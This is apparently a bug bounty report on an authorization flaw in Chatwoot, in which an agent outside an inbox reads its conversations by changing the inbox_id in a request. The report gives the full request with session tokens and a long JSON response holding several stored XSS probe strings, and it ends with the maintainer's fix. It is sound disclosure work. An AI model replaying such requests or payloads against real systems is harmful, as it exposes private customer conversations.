Execution with Unnecessary Privileges in chatwoot/chatwoot

Valid

Reported on

Jun 16th 2021


💥 BUG

An unprivileged user can see ticket (conversation) content.

💥 IMPACT

The user is not a member of any inbox but can still see ticket details in an inbox.

💥 STEPS TO REPRODUCE

1. First, from the admin account go to https://app.chatwoot.com/app/accounts/4534/settings/agents/list and add a new agent, user-B.
Do not add this agent to any inboxes.

2. As admin, go to https://app.chatwoot.com/app/accounts/4534/settings/inboxes/list, add an inbox and add some conversations to it.
User-B should not be able to see any of this content.

3. Now, from user-B's account, send the request below to get all ticket details and the last message of each conversation.

GET /api/v1/accounts/4534/conversations?inbox_id=3763&status=open&assignee_type=all&page=1 HTTP/1.1
Host: app.chatwoot.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://app.chatwoot.com/app/accounts/4534/inbox/3763
access-token: GcMVkR0HlMrDhsu1LpF4Cw
token-type: Bearer
client: W0v7b8j_CBiPQJ5glU-QwQ
expiry: 1629105170
uid: yijah65812@greenkic.com
Connection: close
Cookie: .......
ACCOUNT: TEST2

In this request, change the inbox_id parameter value to the inbox_id of the inbox created above; the response discloses all tickets in that inbox together with their last conversation message.

So user-B, who has no access permission for this particular inbox, can still read its conversations: the endpoint filters by the supplied inbox_id without verifying that the requesting user is a member of that inbox.
The response looks like this:


{
    "data": {
        "payload": [
            {
                "inbox_id": 3763, 
                "contact_last_seen_at": 1618518252, 
                "agent_last_seen_at": 1623840039, 
                "labels": [], 
                "unread_count": 0, 
                "can_reply": true, 
                "account_id": 4534, 
                "meta": {
                    "channel": "Channel::WebWidget", 
                    "team": {
                        "is_member": true, 
                        "description": "xss\"'><img src=x onerror=alert(22)>", 
                        "account_id": 4534, 
                        "name": "team1", 
                        "id": 95, 
                        "allow_auto_assign": true
                    }, 
                    "sender": {
                        "identifier": null, 
                        "thumbnail": "https://www.gravatar.com/avatar/789e53074826713fb8ba1b3d68a0876f?d=404", 
                        "custom_attributes": {}, 
                        "availability_status": "offline", 
                        "last_activity_at": 1619785206, 
                        "name": "sdfsj", 
                        "phone_number": null, 
                        "id": 2317584, 
                        "email": "sdfsj@sddsd.com", 
                        "additional_attributes": {
                            "description": "", 
                            "social_profiles": {
                                "facebook": "xss\"'><", 
                                "linkedin": "", 
                                "twitter": ""
                            }, 
                            "company_name": ""
                        }
                    }, 
                    "assignee": {
                        "thumbnail": "https://www.gravatar.com/avatar/8b40af07ac602b05ac7d793cdd19381c?d=404", 
                        "role": "administrator", 
                        "confirmed": true, 
                        "availability_status": "online", 
                        "available_name": "admin", 
                        "account_id": 4534, 
                        "name": "xss\"'><img src=x onerror=alert()>", 
                        "id": 5634, 
                        "email": "jihadi8106@tripaco.com"
                    }
                }, 
                "messages": [
                    {
                        "private": false, 
                        "inbox_id": 3763, 
                        "sender_type": null, 
                        "created_at": 1623840036, 
                        "message_type": 2, 
                        "content": "xss\"'><img src=x onerror=alert()> self-assigned this conversation", 
                        "sender_id": null, 
                        "account_id": 4534, 
                        "updated_at": "2021-06-16T10:40:36.748Z", 
                        "content_type": "text", 
                        "external_source_ids": {}, 
                        "conversation_id": 5, 
                        "id": 1132106, 
                        "source_id": null, 
                        "content_attributes": {}, 
                        "status": "sent"
                    }
                ], 
                "id": 5, 
                "muted": false, 
                "status": "open", 
                "timestamp": 1623840036, 
                "additional_attributes": {
                    "referer": "asdaD://asd.com/?id=xss\"'><img+src=x>", 
                    "initiated_at": {
                        "timestamp": "Fri Apr 16 2021 01:12:47 GMT+0530 (India Standard Time)"
                    }, 
                    "browser": {
                        "browser_name": "Internet Explorer", 
                        "device_name": "Unknown", 
                        "platform_version": "0", 
                        "platform_name": "Windows", 
                        "browser_version": "6.0"
                    }
                }
            }, 
            {
                "inbox_id": 3763, 
                "contact_last_seen_at": 0, 
                "agent_last_seen_at": 1623838161, 
                "labels": [], 
                "unread_count": 0, 
                "can_reply": true, 
                "account_id": 4534, 
                "meta": {
                    "channel": "Channel::WebWidget", 
                    "sender": {
                        "identifier": null, 
                        "thumbnail": "https://www.gravatar.com/avatar/73e6c30aea260d128bde190fb90be2be?d=404", 
                        "custom_attributes": {}, 
                        "availability_status": "offline", 
                        "last_activity_at": 1618566241, 
                        "name": "delicate-sunset-819", 
                        "phone_number": "", 
                        "id": 2327357, 
                        "email": "aaa@dsddd.comw", 
                        "additional_attributes": {
                            "description": "", 
                            "social_profiles": {
                                "facebook": "", 
                                "linkedin": "", 
                                "twitter": ""
                            }, 
                            "company_name": ""
                        }
                    }, 
                    "assignee": {
                        "thumbnail": "https://www.gravatar.com/avatar/601c09191d32c1ae061ac0140576c9e8?d=404", 
                        "role": "agent", 
                        "confirmed": true, 
                        "availability_status": "offline", 
                        "available_name": "user2", 
                        "account_id": 4534, 
                        "name": "user2", 
                        "id": 5646, 
                        "email": "wocali9440@tripaco.com"
                    }
                }, 
                "messages": [
                    {
                        "private": false, 
                        "inbox_id": 3763, 
                        "sender_type": "User", 
                        "created_at": 1618566238, 
                        "message_type": 1, 
                        "content": "Hhh", 
                        "sender_id": 5646, 
                        "account_id": 4534, 
                        "updated_at": "2021-04-16T09:43:58.039Z", 
                        "content_type": null, 
                        "external_source_ids": {}, 
                        "sender": {
                            "type": "user", 
                            "available_name": "user2", 
                            "availability_status": "offline", 
                            "avatar_url": "https://www.gravatar.com/avatar/601c09191d32c1ae061ac0140576c9e8?d=404", 
                            "name": "user2", 
                            "id": 5646
                        }, 
                        "conversation_id": 7, 
                        "id": 393679, 
                        "source_id": null, 
                        "content_attributes": {}, 
                        "status": "sent"
                    }
                ], 
                "id": 7, 
                "muted": false, 
                "status": "open", 
                "timestamp": 1618566238, 
                "additional_attributes": {
                    "referer": "http://localhost/poc/chatwoot.html", 
                    "initiated_at": {
                        "timestamp": "Fri Apr 16 2021 12:32:21 GMT+0530 (India Standard Time)"
                    }, 
                    "browser": {
                        "browser_name": "Firefox", 
                        "device_name": "Unknown", 
                        "platform_version": "0", 
                        "platform_name": "Generic Linux", 
                        "browser_version": "85.0"
                    }
                }
            }, 
            {
                "inbox_id": 3763, 
                "contact_last_seen_at": 0, 
                "agent_last_seen_at": 1623838161, 
                "labels": [], 
                "unread_count": 0, 
                "can_reply": true, 
                "account_id": 4534, 
                "meta": {
                    "channel": "Channel::WebWidget", 
                    "sender": {
                        "identifier": null, 
                        "thumbnail": "", 
                        "custom_attributes": {}, 
                        "availability_status": "offline", 
                        "last_activity_at": 1619784301, 
                        "name": "misty-moon-0", 
                        "phone_number": null, 
                        "id": 2317441, 
                        "email": null, 
                        "additional_attributes": {}
                    }, 
                    "assignee": {
                        "thumbnail": "https://www.gravatar.com/avatar/8b40af07ac602b05ac7d793cdd19381c?d=404", 
                        "role": "administrator", 
                        "confirmed": true, 
                        "availability_status": "online", 
                        "available_name": "admin", 
                        "account_id": 4534, 
                        "name": "xss\"'><img src=x onerror=alert()>", 
                        "id": 5634, 
                        "email": "jihadi8106@tripaco.com"
                    }
                }, 
                "messages": [
                    {
                        "private": false, 
                        "inbox_id": 3763, 
                        "sender_type": "User", 
                        "created_at": 1618565782, 
                        "message_type": 1, 
                        "content": "http://example.com", 
                        "sender_id": 5634, 
                        "account_id": 4534, 
                        "updated_at": "2021-04-16T09:36:22.792Z", 
                        "content_type": null, 
                        "external_source_ids": {}, 
                        "sender": {
                            "type": "user", 
                            "available_name": "admin", 
                            "availability_status": "online", 
                            "avatar_url": "https://www.gravatar.com/avatar/8b40af07ac602b05ac7d793cdd19381c?d=404", 
                            "name": "xss\"'><img src=x onerror=alert()>", 
                            "id": 5634
                        }, 
                        "conversation_id": 2, 
                        "id": 393617, 
                        "source_id": null, 
                        "content_attributes": {}, 
                        "status": "sent"
                    }
                ], 
                "id": 2, 
                "muted": false, 
                "status": "open", 
                "timestamp": 1618565782, 
                "additional_attributes": {
                    "referer": "http://localhost/poc/chatwoot.html", 
                    "initiated_at": {
                        "timestamp": "Fri Apr 16 2021 01:09:24 GMT+0530 (India Standard Time)"
                    }, 
                    "browser": {
                        "browser_name": "Internet Explorer", 
                        "device_name": "Unknown", 
                        "platform_version": "5.0", 
                        "platform_name": "Windows", 
                        "browser_version": "6.0"
                    }
                }
            }, 
            {
                "inbox_id": 3763, 
                "contact_last_seen_at": 0, 
                "agent_last_seen_at": 1619763980, 
                "labels": [], 
                "unread_count": 0, 
                "can_reply": true, 
                "account_id": 4534, 
                "meta": {
                    "channel": "Channel::WebWidget", 
                    "sender": {
                        "identifier": null, 
                        "thumbnail": "", 
                        "custom_attributes": {}, 
                        "availability_status": "offline", 
                        "last_activity_at": 1619763980, 
                        "name": "purple-frog-188", 
                        "phone_number": null, 
                        "id": 2317496, 
                        "email": null, 
                        "additional_attributes": {}
                    }, 
                    "assignee": {
                        "thumbnail": "https://www.gravatar.com/avatar/8b40af07ac602b05ac7d793cdd19381c?d=404", 
                        "role": "administrator", 
                        "confirmed": true, 
                        "availability_status": "online", 
                        "available_name": "admin", 
                        "account_id": 4534, 
                        "name": "xss\"'><img src=x onerror=alert()>", 
                        "id": 5634, 
                        "email": "jihadi8106@tripaco.com"
                    }
                }, 
                "messages": [
                    {
                        "private": false, 
                        "inbox_id": 3763, 
                        "sender_type": "Contact", 
                        "created_at": 1618515820, 
                        "message_type": 0, 
                        "content": "dddhi", 
                        "sender_id": 2317496, 
                        "account_id": 4534, 
                        "updated_at": "2021-04-15T19:43:40.544Z", 
                        "content_type": "text", 
                        "external_source_ids": {}, 
                        "sender": {
                            "identifier": null, 
                            "thumbnail": "", 
                            "pubsub_token": "ZUbp1KYVyeWJGd2QH9nnsEJS", 
                            "type": "contact", 
                            "name": "purple-frog-188", 
                            "phone_number": null, 
                            "id": 2317496, 
                            "email": null, 
                            "additional_attributes": {}
                        }, 
                        "conversation_id": 3, 
                        "id": 392017, 
                        "source_id": null, 
                        "content_attributes": {}, 
                        "status": "sent"
                    }
                ], 
                "id": 3, 
                "muted": false, 
                "status": "open", 
                "timestamp": 1618515820, 
                "additional_attributes": {
                    "referer": "http://localhost/poc/chatwoot.html", 
                    "initiated_at": {
                        "timestamp": "Fri Apr 16 2021 01:12:47 GMT+0530 (India Standard Time)"
                    }, 
                    "browser": {
                        "browser_name": "Internet Explorer", 
                        "device_name": "Unknown", 
                        "platform_version": "5.0", 
                        "platform_name": "Windows", 
                        "browser_version": "6.0"
                    }
                }
            }
        ], 
        "meta": {
            "all_count": 4, 
            "mine_count": 0, 
            "unassigned_count": 0
        }
    }
}
Sojan Jose validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sojan Jose
a year ago

Maintainer


fixed in https://github.com/chatwoot/chatwoot/pull/2224

Sojan Jose confirmed that a fix has been merged on 534acf a month ago
The fix bounty has been dropped